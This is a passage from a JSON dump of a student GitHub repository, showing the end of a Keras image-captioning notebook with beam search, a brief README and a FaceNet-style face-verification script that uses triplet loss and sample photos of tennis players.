verbose=2)\n\nfinal_model.save_weights('time_inceptionV3_7_loss_3.2604.h5')\n\nfinal_model.load_weights('time_inceptionV3_7_loss_3.2604.h5')\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.save_weights('time_inceptionV3_3.21_loss.h5')\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.save_weights('time_inceptionV3_3.15_loss.h5')\n\nfinal_model.fit(data_generator(batch_size=128), steps_per_epoch=steps_per_epoch, epochs=1, verbose=2)\n\nfinal_model.load_weights('time_inceptionV3_1.5987_loss.h5')\n\n\ndef predict_captions(image):\n start_word = [\"<start>\"]\n while True:\n par_caps = [word2idx[i] for i in start_word]\n par_caps = sequence.pad_sequences([par_caps], maxlen=max_len, padding='post')\n e = encoding_test[image[len(images):]]\n preds = final_model.predict([np.array([e]), np.array(par_caps)])\n word_pred = idx2word[np.argmax(preds[0])]\n start_word.append(word_pred)\n \n if word_pred == \"<end>\" or len(start_word) > max_len:\n break\n \n return ' '.join(start_word[1:-1])\n\ndef beam_search_predictions(image, beam_index = 3):\n start = [word2idx[\"<start>\"]]\n \n start_word = [[start, 0.0]]\n \n while len(start_word[0][0]) < max_len:\n temp = []\n for s in start_word:\n par_caps = sequence.pad_sequences([s[0]], maxlen=max_len, padding='post')\n e = encoding_test[image[len(images):]]\n preds = final_model.predict([np.array([e]), np.array(par_caps)])\n \n word_preds = np.argsort(preds[0])[-beam_index:]\n \n for w in word_preds:\n next_cap, prob = s[0][:], s[1]\n next_cap.append(w)\n prob += preds[0][w]\n temp.append([next_cap, prob])\n \n start_word = temp\n start_word = sorted(start_word, reverse=False, key=lambda l: l[1])\n start_word = start_word[-beam_index:]\n \n start_word = start_word[-1][0]\n intermediate_caption = [idx2word[i] for i in start_word]\n\n final_caption = []\n \n for i in intermediate_caption:\n if i != '<end>':\n final_caption.append(i)\n else:\n break\n \n final_caption = ' '.join(final_caption[1:])\n return final_caption\n\ntry_image = test_img[0]\nImage.open(try_image)\n\nprint ('Normal Max search:', 
predict_captions(try_image)) \nprint ('Beam Search, k=3:', beam_search_predictions(try_image, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(try_image, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(try_image, beam_index=7))\n\n\n\ntry_image2 = test_img[7]\nImage.open(try_image2)\n\nprint ('Normal Max search:', predict_captions(try_image2)) \nprint ('Beam Search, k=3:', beam_search_predictions(try_image2, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(try_image2, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(try_image2, beam_index=7))\n\n\n\ntry_image3 = test_img[851]\nImage.open(try_image3)\n\nprint ('Normal Max search:', predict_captions(try_image3)) \nprint ('Beam Search, k=3:', beam_search_predictions(try_image3, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(try_image3, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(try_image3, beam_index=7))\n\n\n\ntry_image4 = 'Flickr8k_Dataset/Flicker8k_Dataset/136552115_6dc3e7231c.jpg'\nprint ('Normal Max search:', predict_captions(try_image4))\nprint ('Beam Search, k=3:', beam_search_predictions(try_image4, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(try_image4, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(try_image4, beam_index=7))\nImage.open(try_image4)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/1674612291_7154c5ab61.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/384577800_fc325af410.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/3631986552_944ea208fc.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/3320032226_63390d74a6.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/3316725440_9ccd9b5417.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/2306674172_dc07c7f847.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, 
beam_index=7))\nImage.open(im)\n\n\n\nim = 'Flickr8k_Dataset/Flicker8k_Dataset/2542662402_d781dd7f7c.jpg'\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n\n\n\nim = test_img[int(np.random.randint(0, 1000, size=1))]\nprint (im)\nprint ('Normal Max search:', predict_captions(im))\nprint ('Beam Search, k=3:', beam_search_predictions(im, beam_index=3))\nprint ('Beam Search, k=5:', beam_search_predictions(im, beam_index=5))\nprint ('Beam Search, k=7:', beam_search_predictions(im, beam_index=7))\nImage.open(im)\n"
},
{
"alpha_fraction": 0.6690140962600708,
"alphanum_fraction": 0.7253521084785461,
"avg_line_length": 19.428571701049805,
"blob_id": "2700ee59637a8cf4bd12e1d640b618c02a645478",
"content_id": "0f669011b35a1389afd28920fe1367cf6facb2f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 142,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 7,
"path": "/README.md",
"repo_name": "Riya-tech/ARBIE_2020",
"src_encoding": "UTF-8",
"text": "# ARBIE_2020\nA repo for ARBIE, 2020\n\n## Tracks:\n### Software/ Intelligence\n### Electronics and Motion \n### Mechanical/ Mechanisms for movement"
},
{
"alpha_fraction": 0.5061231851577759,
"alphanum_fraction": 0.5782306790351868,
"avg_line_length": 38.220428466796875,
"blob_id": "eb0958a1991288c1c00ba101b726c1b59c4521ca",
"content_id": "0119a1b2762d7c35e0b93b122c1bf09b3a6d810f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 21884,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 558,
"path": "/Software/arbie_facerecognition.py",
"repo_name": "Riya-tech/ARBIE_2020",
"src_encoding": "UTF-8",
"text": "#Unzip the files uploaded \n!unzip -qq weights.zip -d weights\n!unzip -qq datasets.zip -d datasets\n!unzip -qq images.zip -d images\n\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport cv2\nfrom numpy import genfromtxt\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.pooling import MaxPooling2D, AveragePooling2D\nimport h5py\nimport matplotlib.pyplot as plt\n\n\n_FLOATX = 'float32'\n\ndef variable(value, dtype=_FLOATX, name=None):\n v = tf.Variable(np.asarray(value, dtype=dtype), name=name)\n _get_session().run(v.initializer)\n return v\n\ndef shape(x):\n return x.get_shape()\n\ndef square(x):\n return tf.square(x)\n\ndef zeros(shape, dtype=_FLOATX, name=None):\n return variable(np.zeros(shape), dtype, name)\n\ndef concatenate(tensors, axis=-1):\n if axis < 0:\n axis = axis % len(tensors[0].get_shape())\n return tf.concat(axis, tensors)\n\ndef LRN2D(x):\n return tf.nn.lrn(x, alpha=1e-4, beta=0.75)\n\ndef conv2d_bn(x,\n layer=None,\n cv1_out=None,\n cv1_filter=(1, 1),\n cv1_strides=(1, 1),\n cv2_out=None,\n cv2_filter=(3, 3),\n cv2_strides=(1, 1),\n padding=None):\n num = '' if cv2_out == None else '1'\n tensor = Conv2D(cv1_out, cv1_filter, strides=cv1_strides, data_format='channels_first', name=layer+'_conv'+num)(x)\n tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer+'_bn'+num)(tensor)\n tensor = Activation('relu')(tensor)\n if padding == None:\n return tensor\n tensor = ZeroPadding2D(padding=padding, data_format='channels_first')(tensor)\n if cv2_out == None:\n return tensor\n tensor = Conv2D(cv2_out, cv2_filter, strides=cv2_strides, data_format='channels_first', name=layer+'_conv'+'2')(tensor)\n tensor = BatchNormalization(axis=1, epsilon=0.00001, name=layer+'_bn'+'2')(tensor)\n tensor = Activation('relu')(tensor)\n return tensor\n\nWEIGHTS = [\n 'conv1', 'bn1', 'conv2', 'bn2', 'conv3', 'bn3',\n 'inception_3a_1x1_conv', 'inception_3a_1x1_bn',\n 'inception_3a_pool_conv', 'inception_3a_pool_bn',\n 'inception_3a_5x5_conv1', 'inception_3a_5x5_conv2', 'inception_3a_5x5_bn1', 'inception_3a_5x5_bn2',\n 'inception_3a_3x3_conv1', 'inception_3a_3x3_conv2', 'inception_3a_3x3_bn1', 'inception_3a_3x3_bn2',\n 'inception_3b_3x3_conv1', 'inception_3b_3x3_conv2', 'inception_3b_3x3_bn1', 'inception_3b_3x3_bn2',\n 'inception_3b_5x5_conv1', 'inception_3b_5x5_conv2', 'inception_3b_5x5_bn1', 'inception_3b_5x5_bn2',\n 'inception_3b_pool_conv', 'inception_3b_pool_bn',\n 'inception_3b_1x1_conv', 'inception_3b_1x1_bn',\n 'inception_3c_3x3_conv1', 'inception_3c_3x3_conv2', 'inception_3c_3x3_bn1', 'inception_3c_3x3_bn2',\n 'inception_3c_5x5_conv1', 'inception_3c_5x5_conv2', 'inception_3c_5x5_bn1', 'inception_3c_5x5_bn2',\n 'inception_4a_3x3_conv1', 'inception_4a_3x3_conv2', 'inception_4a_3x3_bn1', 'inception_4a_3x3_bn2',\n 'inception_4a_5x5_conv1', 'inception_4a_5x5_conv2', 'inception_4a_5x5_bn1', 'inception_4a_5x5_bn2',\n 'inception_4a_pool_conv', 'inception_4a_pool_bn',\n 'inception_4a_1x1_conv', 'inception_4a_1x1_bn',\n 'inception_4e_3x3_conv1', 'inception_4e_3x3_conv2', 'inception_4e_3x3_bn1', 'inception_4e_3x3_bn2',\n 'inception_4e_5x5_conv1', 'inception_4e_5x5_conv2', 'inception_4e_5x5_bn1', 'inception_4e_5x5_bn2',\n 'inception_5a_3x3_conv1', 'inception_5a_3x3_conv2', 'inception_5a_3x3_bn1', 'inception_5a_3x3_bn2',\n 'inception_5a_pool_conv', 'inception_5a_pool_bn',\n 'inception_5a_1x1_conv', 'inception_5a_1x1_bn',\n 
'inception_5b_3x3_conv1', 'inception_5b_3x3_conv2', 'inception_5b_3x3_bn1', 'inception_5b_3x3_bn2',\n 'inception_5b_pool_conv', 'inception_5b_pool_bn',\n 'inception_5b_1x1_conv', 'inception_5b_1x1_bn',\n 'dense_layer'\n]\n\nconv_shape = {\n 'conv1': [64, 3, 7, 7],\n 'conv2': [64, 64, 1, 1],\n 'conv3': [192, 64, 3, 3],\n 'inception_3a_1x1_conv': [64, 192, 1, 1],\n 'inception_3a_pool_conv': [32, 192, 1, 1],\n 'inception_3a_5x5_conv1': [16, 192, 1, 1],\n 'inception_3a_5x5_conv2': [32, 16, 5, 5],\n 'inception_3a_3x3_conv1': [96, 192, 1, 1],\n 'inception_3a_3x3_conv2': [128, 96, 3, 3],\n 'inception_3b_3x3_conv1': [96, 256, 1, 1],\n 'inception_3b_3x3_conv2': [128, 96, 3, 3],\n 'inception_3b_5x5_conv1': [32, 256, 1, 1],\n 'inception_3b_5x5_conv2': [64, 32, 5, 5],\n 'inception_3b_pool_conv': [64, 256, 1, 1],\n 'inception_3b_1x1_conv': [64, 256, 1, 1],\n 'inception_3c_3x3_conv1': [128, 320, 1, 1],\n 'inception_3c_3x3_conv2': [256, 128, 3, 3],\n 'inception_3c_5x5_conv1': [32, 320, 1, 1],\n 'inception_3c_5x5_conv2': [64, 32, 5, 5],\n 'inception_4a_3x3_conv1': [96, 640, 1, 1],\n 'inception_4a_3x3_conv2': [192, 96, 3, 3],\n 'inception_4a_5x5_conv1': [32, 640, 1, 1,],\n 'inception_4a_5x5_conv2': [64, 32, 5, 5],\n 'inception_4a_pool_conv': [128, 640, 1, 1],\n 'inception_4a_1x1_conv': [256, 640, 1, 1],\n 'inception_4e_3x3_conv1': [160, 640, 1, 1],\n 'inception_4e_3x3_conv2': [256, 160, 3, 3],\n 'inception_4e_5x5_conv1': [64, 640, 1, 1],\n 'inception_4e_5x5_conv2': [128, 64, 5, 5],\n 'inception_5a_3x3_conv1': [96, 1024, 1, 1],\n 'inception_5a_3x3_conv2': [384, 96, 3, 3],\n 'inception_5a_pool_conv': [96, 1024, 1, 1],\n 'inception_5a_1x1_conv': [256, 1024, 1, 1],\n 'inception_5b_3x3_conv1': [96, 736, 1, 1],\n 'inception_5b_3x3_conv2': [384, 96, 3, 3],\n 'inception_5b_pool_conv': [96, 736, 1, 1],\n 'inception_5b_1x1_conv': [256, 736, 1, 1],\n}\n\ndef load_weights_from_FaceNet(FRmodel):\n weights = WEIGHTS\n weights_dict = load_weights()\n\n for name in weights:\n if FRmodel.get_layer(name) != None:\n FRmodel.get_layer(name).set_weights(weights_dict[name])\n elif model.get_layer(name) != None:\n model.get_layer(name).set_weights(weights_dict[name])\n\ndef load_weights():\n dirPath = './weights'\n fileNames = filter(lambda f: not f.startswith('.'), os.listdir(dirPath))\n paths = {}\n weights_dict = {}\n\n for n in fileNames:\n paths[n.replace('.csv', '')] = dirPath + '/' + n\n\n for name in WEIGHTS:\n if 'conv' in name:\n conv_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)\n conv_w = np.reshape(conv_w, conv_shape[name])\n conv_w = np.transpose(conv_w, (2, 3, 1, 0))\n conv_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)\n weights_dict[name] = [conv_w, conv_b] \n elif 'bn' in name:\n bn_w = genfromtxt(paths[name + '_w'], delimiter=',', dtype=None)\n bn_b = genfromtxt(paths[name + '_b'], delimiter=',', dtype=None)\n bn_m = genfromtxt(paths[name + '_m'], delimiter=',', dtype=None)\n bn_v = genfromtxt(paths[name + '_v'], delimiter=',', dtype=None)\n weights_dict[name] = [bn_w, bn_b, bn_m, bn_v]\n elif 'dense' in name:\n dense_w = genfromtxt(dirPath+'/dense_w.csv', delimiter=',', dtype=None)\n dense_w = np.reshape(dense_w, (128, 736))\n dense_w = np.transpose(dense_w, (1, 0))\n dense_b = genfromtxt(dirPath+'/dense_b.csv', delimiter=',', dtype=None)\n weights_dict[name] = [dense_w, dense_b]\n\n return weights_dict\n\n\ndef load_dataset():\n train_dataset = h5py.File('datasets/datasets/train_happy.h5', \"r\")\n train_set_x_orig = np.array(train_dataset[\"train_set_x\"][:]) \n 
train_set_y_orig = np.array(train_dataset[\"train_set_y\"][:]) \n\n test_dataset = h5py.File('datasets/datasets/test_happy.h5', \"r\")\n test_set_x_orig = np.array(test_dataset[\"test_set_x\"][:])\n test_set_y_orig = np.array(test_dataset[\"test_set_y\"][:]) \n\n classes = np.array(test_dataset[\"list_classes\"][:])\n \n train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))\n test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))\n \n return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes\n\ndef img_to_encoding(image_path, model):\n img1 = cv2.imread(image_path, 1)\n image = cv2.resize(img1, (96, 96)) \n img = image[...,::-1]\n img = np.around(np.transpose(img, (2,0,1))/255.0, decimals=12)\n x_train = np.array([img])\n embedding = model.predict_on_batch(x_train)\n return embedding\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nfrom numpy import genfromtxt\nfrom keras import backend as K\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.pooling import MaxPooling2D, AveragePooling2D\nfrom keras.layers.core import Lambda, Flatten, Dense\n\ndef inception_block_1a(X):\n\n \n X_3x3 = Conv2D(96, (1, 1), data_format='channels_first', name ='inception_3a_3x3_conv1')(X)\n X_3x3 = BatchNormalization(axis=1, epsilon=0.00001, name = 'inception_3a_3x3_bn1')(X_3x3)\n X_3x3 = Activation('relu')(X_3x3)\n X_3x3 = ZeroPadding2D(padding=(1, 1), data_format='channels_first')(X_3x3)\n X_3x3 = Conv2D(128, (3, 3), data_format='channels_first', name='inception_3a_3x3_conv2')(X_3x3)\n X_3x3 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3a_3x3_bn2')(X_3x3)\n X_3x3 = Activation('relu')(X_3x3)\n \n X_5x5 = Conv2D(16, (1, 1), data_format='channels_first', name='inception_3a_5x5_conv1')(X)\n X_5x5 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3a_5x5_bn1')(X_5x5)\n X_5x5 = Activation('relu')(X_5x5)\n X_5x5 = ZeroPadding2D(padding=(2, 2), data_format='channels_first')(X_5x5)\n X_5x5 = Conv2D(32, (5, 5), data_format='channels_first', name='inception_3a_5x5_conv2')(X_5x5)\n X_5x5 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3a_5x5_bn2')(X_5x5)\n X_5x5 = Activation('relu')(X_5x5)\n\n X_pool = MaxPooling2D(pool_size=3, strides=2, data_format='channels_first')(X)\n X_pool = Conv2D(32, (1, 1), data_format='channels_first', name='inception_3a_pool_conv')(X_pool)\n X_pool = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3a_pool_bn')(X_pool)\n X_pool = Activation('relu')(X_pool)\n X_pool = ZeroPadding2D(padding=((3, 4), (3, 4)), data_format='channels_first')(X_pool)\n\n X_1x1 = Conv2D(64, (1, 1), data_format='channels_first', name='inception_3a_1x1_conv')(X)\n X_1x1 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3a_1x1_bn')(X_1x1)\n X_1x1 = Activation('relu')(X_1x1)\n \n inception = concatenate([X_3x3, X_5x5, X_pool, X_1x1], axis=1)\n\n return inception\n\ndef inception_block_1b(X):\n X_3x3 = Conv2D(96, (1, 1), data_format='channels_first', name='inception_3b_3x3_conv1')(X)\n X_3x3 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3b_3x3_bn1')(X_3x3)\n X_3x3 = Activation('relu')(X_3x3)\n X_3x3 = ZeroPadding2D(padding=(1, 1), data_format='channels_first')(X_3x3)\n X_3x3 = Conv2D(128, (3, 3), data_format='channels_first', name='inception_3b_3x3_conv2')(X_3x3)\n X_3x3 = BatchNormalization(axis=1, epsilon=0.00001, 
name='inception_3b_3x3_bn2')(X_3x3)\n X_3x3 = Activation('relu')(X_3x3)\n\n X_5x5 = Conv2D(32, (1, 1), data_format='channels_first', name='inception_3b_5x5_conv1')(X)\n X_5x5 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3b_5x5_bn1')(X_5x5)\n X_5x5 = Activation('relu')(X_5x5)\n X_5x5 = ZeroPadding2D(padding=(2, 2), data_format='channels_first')(X_5x5)\n X_5x5 = Conv2D(64, (5, 5), data_format='channels_first', name='inception_3b_5x5_conv2')(X_5x5)\n X_5x5 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3b_5x5_bn2')(X_5x5)\n X_5x5 = Activation('relu')(X_5x5)\n\n X_pool = AveragePooling2D(pool_size=(3, 3), strides=(3, 3), data_format='channels_first')(X)\n X_pool = Conv2D(64, (1, 1), data_format='channels_first', name='inception_3b_pool_conv')(X_pool)\n X_pool = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3b_pool_bn')(X_pool)\n X_pool = Activation('relu')(X_pool)\n X_pool = ZeroPadding2D(padding=(4, 4), data_format='channels_first')(X_pool)\n\n X_1x1 = Conv2D(64, (1, 1), data_format='channels_first', name='inception_3b_1x1_conv')(X)\n X_1x1 = BatchNormalization(axis=1, epsilon=0.00001, name='inception_3b_1x1_bn')(X_1x1)\n X_1x1 = Activation('relu')(X_1x1)\n\n inception = concatenate([X_3x3, X_5x5, X_pool, X_1x1], axis=1)\n\n return inception\n\ndef inception_block_1c(X):\n X_3x3 = conv2d_bn(X,\n layer='inception_3c_3x3',\n cv1_out=128,\n cv1_filter=(1, 1),\n cv2_out=256,\n cv2_filter=(3, 3),\n cv2_strides=(2, 2),\n padding=(1, 1))\n\n X_5x5 = conv2d_bn(X,\n layer='inception_3c_5x5',\n cv1_out=32,\n cv1_filter=(1, 1),\n cv2_out=64,\n cv2_filter=(5, 5),\n cv2_strides=(2, 2),\n padding=(2, 2))\n\n X_pool = MaxPooling2D(pool_size=3, strides=2, data_format='channels_first')(X)\n X_pool = ZeroPadding2D(padding=((0, 1), (0, 1)), data_format='channels_first')(X_pool)\n\n inception = concatenate([X_3x3, X_5x5, X_pool], axis=1)\n\n return inception\n\ndef inception_block_2a(X):\n X_3x3 = conv2d_bn(X,\n layer='inception_4a_3x3',\n cv1_out=96,\n cv1_filter=(1, 1),\n cv2_out=192,\n cv2_filter=(3, 3),\n cv2_strides=(1, 1),\n padding=(1, 1))\n X_5x5 = conv2d_bn(X,\n layer='inception_4a_5x5',\n cv1_out=32,\n cv1_filter=(1, 1),\n cv2_out=64,\n cv2_filter=(5, 5),\n cv2_strides=(1, 1),\n padding=(2, 2))\n\n X_pool = AveragePooling2D(pool_size=(3, 3), strides=(3, 3), data_format='channels_first')(X)\n X_pool = conv2d_bn(X_pool,\n layer='inception_4a_pool',\n cv1_out=128,\n cv1_filter=(1, 1),\n padding=(2, 2))\n X_1x1 = conv2d_bn(X,\n layer='inception_4a_1x1',\n cv1_out=256,\n cv1_filter=(1, 1))\n inception = concatenate([X_3x3, X_5x5, X_pool, X_1x1], axis=1)\n\n return inception\n\ndef inception_block_2b(X):\n #inception4e\n X_3x3 = conv2d_bn(X,\n layer='inception_4e_3x3',\n cv1_out=160,\n cv1_filter=(1, 1),\n cv2_out=256,\n cv2_filter=(3, 3),\n cv2_strides=(2, 2),\n padding=(1, 1))\n X_5x5 = conv2d_bn(X,\n layer='inception_4e_5x5',\n cv1_out=64,\n cv1_filter=(1, 1),\n cv2_out=128,\n cv2_filter=(5, 5),\n cv2_strides=(2, 2),\n padding=(2, 2))\n \n X_pool = MaxPooling2D(pool_size=3, strides=2, data_format='channels_first')(X)\n X_pool = ZeroPadding2D(padding=((0, 1), (0, 1)), data_format='channels_first')(X_pool)\n\n inception = concatenate([X_3x3, X_5x5, X_pool], axis=1)\n\n return inception\n\ndef inception_block_3a(X):\n X_3x3 = conv2d_bn(X,\n layer='inception_5a_3x3',\n cv1_out=96,\n cv1_filter=(1, 1),\n cv2_out=384,\n cv2_filter=(3, 3),\n cv2_strides=(1, 1),\n padding=(1, 1))\n X_pool = AveragePooling2D(pool_size=(3, 3), strides=(3, 3), 
data_format='channels_first')(X)\n X_pool = conv2d_bn(X_pool,\n layer='inception_5a_pool',\n cv1_out=96,\n cv1_filter=(1, 1),\n padding=(1, 1))\n X_1x1 = conv2d_bn(X,\n layer='inception_5a_1x1',\n cv1_out=256,\n cv1_filter=(1, 1))\n\n inception = concatenate([X_3x3, X_pool, X_1x1], axis=1)\n\n return inception\n\ndef inception_block_3b(X):\n X_3x3 = conv2d_bn(X,\n layer='inception_5b_3x3',\n cv1_out=96,\n cv1_filter=(1, 1),\n cv2_out=384,\n cv2_filter=(3, 3),\n cv2_strides=(1, 1),\n padding=(1, 1))\n X_pool = MaxPooling2D(pool_size=3, strides=2, data_format='channels_first')(X)\n X_pool = conv2d_bn(X_pool,\n layer='inception_5b_pool',\n cv1_out=96,\n cv1_filter=(1, 1))\n X_pool = ZeroPadding2D(padding=(1, 1), data_format='channels_first')(X_pool)\n\n X_1x1 = conv2d_bn(X,\n layer='inception_5b_1x1',\n cv1_out=256,\n cv1_filter=(1, 1))\n inception = concatenate([X_3x3, X_pool, X_1x1], axis=1)\n\n return inception\n\ndef faceRecoModel(input_shape):\n\n X_input = Input(input_shape)\n\n X = ZeroPadding2D((3, 3))(X_input)\n \n X = Conv2D(64, (7, 7), strides = (2, 2), name = 'conv1')(X)\n X = BatchNormalization(axis = 1, name = 'bn1')(X)\n X = Activation('relu')(X)\n \n X = ZeroPadding2D((1, 1))(X)\n X = MaxPooling2D((3, 3), strides = 2)(X)\n \n X = Conv2D(64, (1, 1), strides = (1, 1), name = 'conv2')(X)\n X = BatchNormalization(axis = 1, epsilon=0.00001, name = 'bn2')(X)\n X = Activation('relu')(X)\n \n X = ZeroPadding2D((1, 1))(X)\n\n X = Conv2D(192, (3, 3), strides = (1, 1), name = 'conv3')(X)\n X = BatchNormalization(axis = 1, epsilon=0.00001, name = 'bn3')(X)\n X = Activation('relu')(X)\n \n X = ZeroPadding2D((1, 1))(X)\n X = MaxPooling2D(pool_size = 3, strides = 2)(X)\n \n X = inception_block_1a(X)\n X = inception_block_1b(X)\n X = inception_block_1c(X)\n \n X = inception_block_2a(X)\n X = inception_block_2b(X)\n \n X = inception_block_3a(X)\n X = inception_block_3b(X)\n \n X = AveragePooling2D(pool_size=(3, 3), strides=(1, 1), data_format='channels_first')(X)\n X = Flatten()(X)\n X = Dense(128, name='dense_layer')(X)\n \n X = Lambda(lambda x: K.l2_normalize(x,axis=1))(X)\n\n model = Model(inputs = X_input, outputs = X, name='FaceRecoModel')\n \n return model\n\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.pooling import MaxPooling2D, AveragePooling2D\nfrom keras.layers.merge import Concatenate\nfrom keras.layers.core import Lambda, Flatten, Dense\nfrom keras.initializers import glorot_uniform\nfrom keras.engine.topology import Layer\nfrom keras import backend as K\nK.set_image_data_format('channels_first')\nimport cv2\nimport os\nimport numpy as np\nfrom numpy import genfromtxt\nimport pandas as pd\nimport tensorflow as tf\n\n\nimport sys\nnp.set_printoptions(threshold=sys.maxsize)\n\n\nFRmodel = faceRecoModel(input_shape=(3, 96, 96))\n\nprint(\"Total Params:\", FRmodel.count_params())\n\ndef triplet_loss(y_true, y_pred, alpha = 0.2):\n\n \n anchor, positive, negative = y_pred[0], y_pred[1], y_pred[2]\n \n pos_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, positive)), axis=-1)\n neg_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, negative)), axis=-1)\n basic_loss = tf.subtract(pos_dist, neg_dist) + alpha\n loss = tf.reduce_sum(tf.maximum(basic_loss, 0.0))\n\n return loss\n\nwith tf.compat.v1.Session() as test:\n tf.compat.v1.set_random_seed(1)\n y_true = (None, None, None)\n y_pred = 
(tf.compat.v1.random_normal([3, 128], mean=6, stddev=0.1, seed = 1),\n tf.compat.v1.random_normal([3, 128], mean=1, stddev=1, seed = 1),\n tf.compat.v1.random_normal([3, 128], mean=3, stddev=4, seed = 1))\n loss = triplet_loss(y_true, y_pred)\n \n print(\"loss = \" + str(loss.eval()))\n\n\nFRmodel.compile(optimizer = 'adam', loss = triplet_loss, metrics = ['accuracy'])\nload_weights_from_FaceNet(FRmodel)\n\n\n\ndatabase = {}\ndatabase[\"federer\"] = img_to_encoding(\"images/images/federer.jpg\", FRmodel)\ndatabase[\"nadal\"] = img_to_encoding(\"images/images/nadal.jpg\", FRmodel)\ndatabase[\"djokovic\"] = img_to_encoding(\"images/images/djokovic.jpg\", FRmodel)\n\n\n\ndef verify(image_path, identity, database, model):\n\n\n encoding = img_to_encoding(image_path, model)\n dist = np.linalg.norm(database[identity] - encoding)\n \n if dist < 0.7:\n print(\"It's \" + str(identity) + \", welcome home!\")\n door_open = True\n else:\n print(\"It's not \" + str(identity) + \", please go away\")\n door_open = False\n \n return dist, door_open\n\n\nverify(\"images/images/camera_2.jpg\", \"nadal\", database, FRmodel)\n\n\nverify(\"images/images/camera_1.jpg\", \"djokovic\", database, FRmodel)\n\n\ndef who_is_it(image_path, database, model):\n\n\n encoding = img_to_encoding(image_path, model)\n min_dist = 100\n \n for (name, db_enc) in database.items():\n dist = np.linalg.norm(db_enc - encoding)\n if dist < min_dist:\n min_dist = dist\n identity = name\n\n if min_dist > 0.7:\n print(\"Not in the database.\")\n else:\n print (\"it's \" + str(identity) + \", the distance is \" + str(min_dist))\n 